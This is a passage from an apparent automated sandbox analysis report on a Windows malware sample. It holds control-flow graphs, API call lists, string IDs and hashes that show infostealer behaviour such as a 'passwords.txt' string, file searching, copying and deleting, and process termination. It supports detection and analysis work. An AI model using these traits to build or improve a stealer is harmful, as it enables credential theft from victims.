                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000603000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: lstrcat$lstrcpy$lstrlen$FileHeapmemset$AllocAllocateCopyDeleteLocalProcessSystemTimememcmp
                                                                                                                                                                                                                                                    • String ID: passwords.txt
                                                                                                                                                                                                                                                    • API String ID: 998505060-347816968
                                                                                                                                                                                                                                                    • Opcode ID: e4aa435a432d1640c36eeddb60e941b99fed2284bdd932ff16391f0ed32dd5f6
                                                                                                                                                                                                                                                    • Instruction ID: 0ac359724ea6a1c8e279a26ecf75278969c2121eb42993a507c052d770502f54
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e4aa435a432d1640c36eeddb60e941b99fed2284bdd932ff16391f0ed32dd5f6
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E2C18C75900219ABCB14EBE4DC4AEEEBB79BF19304F10453DF512B3291DB786A08CB65
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 004141B0 Relevance: 39.7, APIs: 11, Strings: 11, Instructions: 1199sleepCOMMON
                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                    control_flow_graph 1899 4141b0-414295 call 40fcc0 * 3 call 40fd60 * 3 call 40fcd0 * 6 1924 414298-41429f call 402660 1899->1924 1927 4143c0-4144b4 call 402390 call 4023c0 call 40fd10 * 3 call 413a00 call 40fdb0 call 40fd50 call 40ff70 StrCmpCA 1924->1927 1928 4142a5-4143bb call 402390 call 40fdb0 call 40fd50 call 4023f0 call 40fd10 * 5 call 4138c0 call 40fdb0 1924->1928 1966 414533-414549 call 40ff70 StrCmpCA 1927->1966 1967 4144b6-41450d call 4023f0 call 40fd10 * 2 call 401060 call 4138c0 1927->1967 1980 41452b-41452e call 40fd50 1928->1980 1976 41511a-415220 call 40fdb0 call 4023f0 call 40fdb0 call 40fd50 call 402680 call 40fdb0 call 40fd50 call 40fd10 * 3 call 40fd50 * 10 1966->1976 1977 41454f-414556 call 402670 1966->1977 2007 414512-414525 call 40fdb0 1967->2007 2349 415224-41524a call 40fd50 * 2 1976->2349 1986 414706-41471c call 40ff70 StrCmpCA 1977->1986 1987 41455c-414563 call 402660 1977->1987 1980->1966 2002 414722-414729 call 402660 1986->2002 2003 41500b-415115 call 40fdb0 call 402480 call 40fdb0 call 40fd50 call 4026b0 call 40fdb0 call 40fd50 call 40fd10 * 3 call 40fd50 * 10 1986->2003 1999 414569-414605 call 402420 call 40fdb0 call 40fd50 call 402480 call 40fd10 call 402420 call 401060 call 4138c0 call 40fdb0 1987->1999 2000 41460a-414687 call 402420 call 402450 call 401060 call 413a00 call 40fdb0 call 40fd50 call 40ff70 StrCmpCA 1987->2000 2179 4146fe-414701 call 40fd50 1999->2179 2000->1986 2126 414689-4146f8 call 402480 call 40fd10 * 2 call 401060 call 4138c0 call 40fdb0 2000->2126 2021 4148ef-414908 call 40ff70 StrCmpCA 2002->2021 2022 41472f-414736 call 402660 2002->2022 2003->2349 2007->1980 2035 414ef9-415006 call 40fdb0 call 402510 call 40fdb0 call 40fd50 call 4026e0 call 40fdb0 call 40fd50 call 40fd10 * 3 call 40fd50 * 10 2021->2035 2036 41490e-414915 call 402660 2021->2036 2041 4147e3-414866 call 4024b0 call 4024e0 call 401060 call 413a00 call 40fdb0 call 40fd50 call 40ff70 StrCmpCA 2022->2041 2042 41473c-4147de call 4024b0 call 40fdb0 call 40fd50 call 402510 call 40fd10 call 4024b0 call 401060 call 4138c0 call 40fdb0 2022->2042 2035->2349 2062 414ac5-414adb call 40ff70 StrCmpCA 2036->2062 2063 41491b-414922 call 402660 2036->2063 2041->2021 2195 41486c-4148e1 call 402510 call 40fd10 * 2 call 401060 call 4138c0 call 40fdb0 2041->2195 2250 4148e7-4148ea call 40fd50 2042->2250 2093 414ae1-414ae8 call 402660 2062->2093 2094 414de4-414ef4 call 40fdb0 call 4025a0 call 40fdb0 call 40fd50 call 402710 call 40fdb0 call 40fd50 call 40fd10 * 3 call 40fd50 * 10 2062->2094 2091 4149c9-414a46 call 402540 call 402570 call 401060 call 413a00 call 40fdb0 call 40fd50 call 40ff70 StrCmpCA 2063->2091 2092 414928-4149c4 call 402540 call 40fdb0 call 40fd50 call 4025a0 call 40fd10 call 402540 call 401060 call 4138c0 call 40fdb0 2063->2092 2091->2062 2275 414a48-414ab7 call 4025a0 call 40fd10 * 2 call 401060 call 4138c0 call 40fdb0 2091->2275 2312 414abd-414ac0 call 40fd50 2092->2312 2119 414ca4-414cba call 40ff70 StrCmpCA 2093->2119 2120 414aee-414af5 call 402660 2093->2120 2094->2349 2161 414ccc-414ddf call 40fdb0 call 402630 call 40fdb0 call 40fd50 call 402740 call 40fdb0 call 40fd50 call 40fd10 * 3 call 40fd50 * 10 2119->2161 2162 414cbc-414cc7 Sleep 2119->2162 2156 414ba2-414c25 call 4025d0 call 402600 call 401060 call 413a00 call 40fdb0 call 40fd50 call 40ff70 StrCmpCA 2120->2156 2157 414afb-414b9d call 4025d0 call 40fdb0 call 40fd50 call 402630 call 40fd10 call 4025d0 call 401060 call 4138c0 call 40fdb0 2120->2157 2126->2179 2156->2119 2334 414c27-414c99 call 402630 call 40fd10 * 2 call 401060 call 4138c0 call 40fdb0 2156->2334 2362 414c9c-414c9f call 40fd50 2157->2362 2161->2349 2162->1924 2179->1986 2195->2250 2250->2021 2275->2312 2312->2062 2334->2362 2362->2119
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                      • Part of subcall function 0040FD60: lstrlenA.KERNEL32(004181A9,?,00000000,?,0041790D,004271B2,004271AF,00000000,?,00000000,004228A8,000000FF,?,004181A9), ref: 0040FD6B
                                                                                                                                                                                                                                                      • Part of subcall function 0040FD60: lstrcpy.KERNEL32(00000000,004181A9), ref: 0040FDA2
                                                                                                                                                                                                                                                      • Part of subcall function 0040FCD0: lstrcpy.KERNEL32(00000000,004180ED), ref: 0040FCF9
                                                                                                                                                                                                                                                    • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 004144AC
                                                                                                                                                                                                                                                      • Part of subcall function 0040FDB0: lstrcpy.KERNEL32(00000000), ref: 0040FDF0
                                                                                                                                                                                                                                                      • Part of subcall function 0040FD10: lstrcpy.KERNEL32(00000000), ref: 0040FD38
                                                                                                                                                                                                                                                      • Part of subcall function 004138C0: StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00413932
                                                                                                                                                                                                                                                    • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00414541
                                                                                                                                                                                                                                                    • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 0041467F
                                                                                                                                                                                                                                                    • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00414714
                                                                                                                                                                                                                                                    • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 0041485E
                                                                                                                                                                                                                                                    • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00414900
                                                                                                                                                                                                                                                    • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00414A3E
                                                                                                                                                                                                                                                    • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00414AD3
                                                                                                                                                                                                                                                    • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00414C1D
                                                                                                                                                                                                                                                    • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00414CB2
                                                                                                                                                                                                                                                    • Sleep.KERNEL32(0000EA60), ref: 00414CC1
                                                                                                                                                                                                                                                      • Part of subcall function 00413A00: StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00413A94
                                                                                                                                                                                                                                                      • Part of subcall function 00413A00: lstrlenA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00421BF9), ref: 00413AAB
                                                                                                                                                                                                                                                      • Part of subcall function 00413A00: StrStrA.SHLWAPI(00000000,00000000), ref: 00413AD7
                                                                                                                                                                                                                                                      • Part of subcall function 00413A00: lstrlenA.KERNEL32(00000000), ref: 00413AEC
                                                                                                                                                                                                                                                      • Part of subcall function 00413A00: lstrlenA.KERNEL32(00000000), ref: 00413B06
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1975724325.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000523000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000526000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.000000000052C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.000000000056A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000603000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: lstrcpylstrlen$Sleep
                                                                                                                                                                                                                                                    • String ID: -$ERROR$ERROR$ERROR$ERROR$ERROR$ERROR$ERROR$ERROR$ERROR$ERROR
                                                                                                                                                                                                                                                    • API String ID: 507064821-1903984052
                                                                                                                                                                                                                                                    • Opcode ID: 44e7a8a44be7a3562165129dc1a8c826065b556d6d69cf15c6c1486d36c3a708
                                                                                                                                                                                                                                                    • Instruction ID: c269cac61f73d8e2650fd55583616d4b120617d9023797c29fa6a8041a422022
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 44e7a8a44be7a3562165129dc1a8c826065b556d6d69cf15c6c1486d36c3a708
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 46B27274C01248EACB14FBA5C556ADDBFB86F15308F1041BEE84673682DB78674CCB66
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 004163B8 Relevance: 38.7, APIs: 18, Strings: 4, Instructions: 215stringfileCOMMON
                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                    control_flow_graph 2430 4163b8-4163bf 2431 4163c0-4163d4 StrCmpCA 2430->2431 2432 4166d4-4166e7 FindNextFileA 2431->2432 2433 4163da-4163ee StrCmpCA 2431->2433 2432->2431 2435 4166ed-416706 FindClose call 40fd50 2432->2435 2433->2432 2434 4163f4-416425 wsprintfA StrCmpCA 2433->2434 2436 416450-41646d wsprintfA 2434->2436 2437 416427-41644e wsprintfA 2434->2437 2443 41670a-416731 call 40fd50 * 2 2435->2443 2440 416470-4164b0 memset lstrcat strtok_s 2436->2440 2437->2440 2441 4164b2-4164c3 2440->2441 2442 4164df-41651c memset lstrcat strtok_s 2440->2442 2445 416671-416676 2441->2445 2452 4164c9-4164dd strtok_s 2441->2452 2442->2445 2446 416522-416532 PathMatchSpecA 2442->2446 2445->2432 2449 416678-416686 2445->2449 2450 4165c4-4165d8 strtok_s 2446->2450 2451 416538-4165c2 call 411310 wsprintfA call 40fd50 call 411790 call 4192a0 2446->2451 2449->2435 2455 416688-416690 2449->2455 2450->2446 2454 4165de 2450->2454 2451->2450 2472 4165e3-4165ee 2451->2472 2452->2441 2452->2442 2454->2445 2455->2432 2458 416692-4166ce call 401060 call 416310 2455->2458 2458->2432 2473 416732-416745 call 40fd50 2472->2473 2474 4165f4-41661a call 40fcd0 call 406d60 2472->2474 2473->2443 2481 416664-41666a 2474->2481 2482 41661c-41665f call 40fcd0 call 401060 call 415250 call 40fd50 2474->2482 2481->2445 2482->2481
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • StrCmpCA.SHLWAPI(?,00427444,?,?,?,?,?,?,?,00416932,?), ref: 004163CC
                                                                                                                                                                                                                                                    • StrCmpCA.SHLWAPI(?,00427448,?,?,?,?,?,?,?,00416932,?), ref: 004163E6
                                                                                                                                                                                                                                                    • wsprintfA.USER32 ref: 0041640B
                                                                                                                                                                                                                                                    • StrCmpCA.SHLWAPI(?,00427173,?,?,?,?,?,?,?,?,?,?,?,00416932,?), ref: 0041641D
                                                                                                                                                                                                                                                    • wsprintfA.USER32 ref: 00416445
                                                                                                                                                                                                                                                      • Part of subcall function 00411790: GetFileSizeEx.KERNEL32(00000000,?), ref: 004117BF
                                                                                                                                                                                                                                                      • Part of subcall function 00411790: CloseHandle.KERNEL32(00000000), ref: 004117CA
                                                                                                                                                                                                                                                    • wsprintfA.USER32 ref: 00416467
                                                                                                                                                                                                                                                    • memset.MSVCRT ref: 0041647D
                                                                                                                                                                                                                                                    • lstrcat.KERNEL32(?,?), ref: 00416490
                                                                                                                                                                                                                                                    • strtok_s.MSVCRT ref: 004164A6
                                                                                                                                                                                                                                                    • strtok_s.MSVCRT ref: 004164D3
                                                                                                                                                                                                                                                    • memset.MSVCRT ref: 004164EC
                                                                                                                                                                                                                                                    • lstrcat.KERNEL32(?,?), ref: 004164FC
                                                                                                                                                                                                                                                    • strtok_s.MSVCRT ref: 00416512
                                                                                                                                                                                                                                                    • PathMatchSpecA.SHLWAPI(?,00000000), ref: 0041652A
                                                                                                                                                                                                                                                    • wsprintfA.USER32 ref: 0041656D
                                                                                                                                                                                                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004165BB
                                                                                                                                                                                                                                                    • strtok_s.MSVCRT ref: 004165CE
                                                                                                                                                                                                                                                    • FindNextFileA.KERNELBASE(?,?,?,?,?,?,?,?,?,00416932,?), ref: 004166DF
                                                                                                                                                                                                                                                    • FindClose.KERNEL32(?,?,?,?,?,?,?,?,00416932,?), ref: 004166F1
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1975724325.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000523000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000526000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.000000000052C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.000000000056A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000603000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: strtok_swsprintf$CloseFileFindlstrcatmemset$HandleMatchNextPathSizeSpecUnothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                                                                                                                                                    • String ID: %s%s$%s\%s$%s\%s\%s$2iA
                                                                                                                                                                                                                                                    • API String ID: 3008008253-767823974
                                                                                                                                                                                                                                                    • Opcode ID: 4d6b892a86baba640f6e2f93ba85ce246787114941fdb21951c7fd222483f9ca
                                                                                                                                                                                                                                                    • Instruction ID: 3914d2a0a16bc24c61f2490161fe216a0c65b09925b9b5bfdc8b5e5d053361c1
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4d6b892a86baba640f6e2f93ba85ce246787114941fdb21951c7fd222483f9ca
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7E71B8B1A00219ABDB24DFA0DC85EEE777DAF58704F10855EF50993241EB38DE88CB65
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 00407320 Relevance: 32.1, APIs: 21, Instructions: 569stringmemoryfileCOMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                      • Part of subcall function 0040FF40: StrCmpCA.SHLWAPI(?,00000000,?,00407356,015CF8D0,?,00000000,?), ref: 0040FF4A
                                                                                                                                                                                                                                                      • Part of subcall function 0040FD60: lstrlenA.KERNEL32(004181A9,?,00000000,?,0041790D,004271B2,004271AF,00000000,?,00000000,004228A8,000000FF,?,004181A9), ref: 0040FD6B
                                                                                                                                                                                                                                                      • Part of subcall function 0040FD60: lstrcpy.KERNEL32(00000000,004181A9), ref: 0040FDA2
                                                                                                                                                                                                                                                      • Part of subcall function 0040FCD0: lstrcpy.KERNEL32(00000000,004180ED), ref: 0040FCF9
                                                                                                                                                                                                                                                      • Part of subcall function 0040FE90: lstrlenA.KERNEL32(?,?,?,?,?,?,004214E9,000000FF,?,00418113,?,015C2E10,?), ref: 0040FECC
                                                                                                                                                                                                                                                      • Part of subcall function 0040FE90: lstrcpy.KERNEL32(00000000), ref: 0040FEF7
                                                                                                                                                                                                                                                      • Part of subcall function 0040FE90: lstrcat.KERNEL32(?,?), ref: 0040FF01
                                                                                                                                                                                                                                                      • Part of subcall function 0040FDB0: lstrcpy.KERNEL32(00000000), ref: 0040FDF0
                                                                                                                                                                                                                                                      • Part of subcall function 00411310: GetSystemTime.KERNEL32(?,015CF0B0,004270A0,?,00000000,00000008,?,?,00000000,004216B1,000000FF,?,0040452E,0041F9D9,00000014), ref: 00411365
                                                                                                                                                                                                                                                      • Part of subcall function 0040FE00: lstrcpy.KERNEL32(00000000), ref: 0040FE63
                                                                                                                                                                                                                                                      • Part of subcall function 0040FE00: lstrcat.KERNEL32(?,00000000), ref: 0040FE6F
                                                                                                                                                                                                                                                    • CopyFileA.KERNEL32(00000000,00000000,00000001,00000000,?,00000000,00000000,?), ref: 004073FF
                                                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,000F423F), ref: 004076B6
                                                                                                                                                                                                                                                    • lstrcat.KERNEL32(000000FF,00000000), ref: 00407805
                                                                                                                                                                                                                                                    • lstrcat.KERNEL32(000000FF,004268C8), ref: 00407814
                                                                                                                                                                                                                                                    • lstrcat.KERNEL32(000000FF,00000000), ref: 00407827
                                                                                                                                                                                                                                                    • lstrcat.KERNEL32(000000FF,004268CC), ref: 00407836
                                                                                                                                                                                                                                                    • lstrcat.KERNEL32(000000FF,00000000), ref: 00407849
                                                                                                                                                                                                                                                    • lstrcat.KERNEL32(000000FF,004268D0), ref: 00407858
                                                                                                                                                                                                                                                    • lstrcat.KERNEL32(000000FF,00000000), ref: 0040786B
                                                                                                                                                                                                                                                    • lstrcat.KERNEL32(000000FF,004268D4), ref: 0040787A
                                                                                                                                                                                                                                                    • lstrcat.KERNEL32(000000FF,00000000), ref: 0040788D
                                                                                                                                                                                                                                                    • lstrcat.KERNEL32(000000FF,004268D8), ref: 0040789C
                                                                                                                                                                                                                                                    • lstrcat.KERNEL32(000000FF,00000000), ref: 004078AF
                                                                                                                                                                                                                                                    • lstrcat.KERNEL32(000000FF,004268DC), ref: 004078BE
                                                                                                                                                                                                                                                    • lstrcat.KERNEL32(000000FF,00000000), ref: 00407905
                                                                                                                                                                                                                                                    • lstrcat.KERNEL32(000000FF,004268E0), ref: 00407923
                                                                                                                                                                                                                                                    • lstrlenA.KERNEL32(000000FF), ref: 0040798A
                                                                                                                                                                                                                                                    • lstrlenA.KERNEL32(000000FF), ref: 00407999
                                                                                                                                                                                                                                                    • RtlAllocateHeap.NTDLL(00000000), ref: 004076BD
                                                                                                                                                                                                                                                      • Part of subcall function 0040FD10: lstrcpy.KERNEL32(00000000), ref: 0040FD38
                                                                                                                                                                                                                                                      • Part of subcall function 004118E0: memset.MSVCRT ref: 00411915
                                                                                                                                                                                                                                                      • Part of subcall function 004118E0: GetProcessHeap.KERNEL32(00000000,000000FA,?,00000000,?,00407426,0040D964), ref: 00411946
                                                                                                                                                                                                                                                      • Part of subcall function 004118E0: HeapAlloc.KERNEL32(00000000,?,00407426,0040D964), ref: 0041194D
                                                                                                                                                                                                                                                      • Part of subcall function 004118E0: wsprintfW.USER32 ref: 0041195C
                                                                                                                                                                                                                                                      • Part of subcall function 004118E0: OpenProcess.KERNEL32(00001001,00000000), ref: 004119BD
                                                                                                                                                                                                                                                      • Part of subcall function 004118E0: TerminateProcess.KERNEL32(00000000,00000000), ref: 004119CC
                                                                                                                                                                                                                                                      • Part of subcall function 004118E0: CloseHandle.KERNEL32(00000000), ref: 004119D3
                                                                                                                                                                                                                                                    • memset.MSVCRT ref: 004079F0
                                                                                                                                                                                                                                                    • DeleteFileA.KERNEL32(00000000,?,?,?,00426892), ref: 00407A18
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1975724325.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000523000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000526000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.000000000052C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.000000000056A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000603000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: lstrcat$lstrcpy$HeapProcesslstrlen$Filememset$AllocAllocateCloseCopyDeleteHandleOpenSystemTerminateTimewsprintf
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 2944411387-0
                                                                                                                                                                                                                                                    • Opcode ID: 0dc964706491e1e789b6f216bf6cc462d48b7b356a0123e99c137502b1b01115
                                                                                                                                                                                                                                                    • Instruction ID: d445063f973bb5494ba5e5b507ab34cb809137a4ce24e3bfedff2f6959796d67
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0dc964706491e1e789b6f216bf6cc462d48b7b356a0123e99c137502b1b01115
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 28325D71900249EADB14EBE4DC55AEEBB78AF15308F10417EF502736D2DB786A08CB65
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 00409610 Relevance: 31.9, APIs: 21, Instructions: 433stringmemoryfileCOMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                      • Part of subcall function 0040FCD0: lstrcpy.KERNEL32(00000000,004180ED), ref: 0040FCF9
                                                                                                                                                                                                                                                      • Part of subcall function 0040FE90: lstrlenA.KERNEL32(?,?,?,?,?,?,004214E9,000000FF,?,00418113,?,015C2E10,?), ref: 0040FECC
                                                                                                                                                                                                                                                      • Part of subcall function 0040FE90: lstrcpy.KERNEL32(00000000), ref: 0040FEF7
                                                                                                                                                                                                                                                      • Part of subcall function 0040FE90: lstrcat.KERNEL32(?,?), ref: 0040FF01
                                                                                                                                                                                                                                                      • Part of subcall function 0040FDB0: lstrcpy.KERNEL32(00000000), ref: 0040FDF0
                                                                                                                                                                                                                                                      • Part of subcall function 00411310: GetSystemTime.KERNEL32(?,015CF0B0,004270A0,?,00000000,00000008,?,?,00000000,004216B1,000000FF,?,0040452E,0041F9D9,00000014), ref: 00411365
                                                                                                                                                                                                                                                      • Part of subcall function 0040FE00: lstrcpy.KERNEL32(00000000), ref: 0040FE63
                                                                                                                                                                                                                                                      • Part of subcall function 0040FE00: lstrcat.KERNEL32(?,00000000), ref: 0040FE6F
                                                                                                                                                                                                                                                    • CopyFileA.KERNEL32(00000000,00000000,00000001,00000000,00000000,00000000,004268CF,00000009), ref: 004096D6
                                                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00409842
                                                                                                                                                                                                                                                    • RtlAllocateHeap.NTDLL(00000000), ref: 00409849
                                                                                                                                                                                                                                                    • lstrcat.KERNEL32(000000FF,00000000), ref: 0040998F
                                                                                                                                                                                                                                                    • lstrcat.KERNEL32(000000FF,00426AA8), ref: 0040999E
                                                                                                                                                                                                                                                    • lstrcat.KERNEL32(000000FF,00000000), ref: 004099B1
                                                                                                                                                                                                                                                    • lstrcat.KERNEL32(000000FF,00426AAC), ref: 004099C0
                                                                                                                                                                                                                                                    • lstrcat.KERNEL32(000000FF,00000000), ref: 004099D3
                                                                                                                                                                                                                                                    • lstrcat.KERNEL32(000000FF,00426AB0), ref: 004099E2
                                                                                                                                                                                                                                                    • lstrcat.KERNEL32(000000FF,00000000), ref: 004099F5
                                                                                                                                                                                                                                                    • lstrcat.KERNEL32(000000FF,00426AB4), ref: 00409A04
                                                                                                                                                                                                                                                    • lstrcat.KERNEL32(000000FF,00000000), ref: 00409A17
                                                                                                                                                                                                                                                    • lstrcat.KERNEL32(000000FF,00426AB8), ref: 00409A26
                                                                                                                                                                                                                                                    • lstrcat.KERNEL32(000000FF,00000000), ref: 00409A39
                                                                                                                                                                                                                                                    • lstrcat.KERNEL32(000000FF,00426ABC), ref: 00409A48
                                                                                                                                                                                                                                                    • lstrcat.KERNEL32(000000FF,00000000), ref: 00409A5B
                                                                                                                                                                                                                                                    • lstrcat.KERNEL32(000000FF,00426AC0), ref: 00409A6A
                                                                                                                                                                                                                                                    • lstrlenA.KERNEL32(000000FF), ref: 00409AE0
                                                                                                                                                                                                                                                    • lstrlenA.KERNEL32(000000FF), ref: 00409AEF
                                                                                                                                                                                                                                                    • memset.MSVCRT ref: 00409B45
                                                                                                                                                                                                                                                      • Part of subcall function 0040FF40: StrCmpCA.SHLWAPI(?,00000000,?,00407356,015CF8D0,?,00000000,?), ref: 0040FF4A
                                                                                                                                                                                                                                                    • DeleteFileA.KERNEL32(00000000), ref: 00409B6D
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1975724325.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000523000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000526000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.000000000052C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.000000000056A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000603000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcessSystemTimememset
                                                                                                                                                                                                                                                    • String ID:
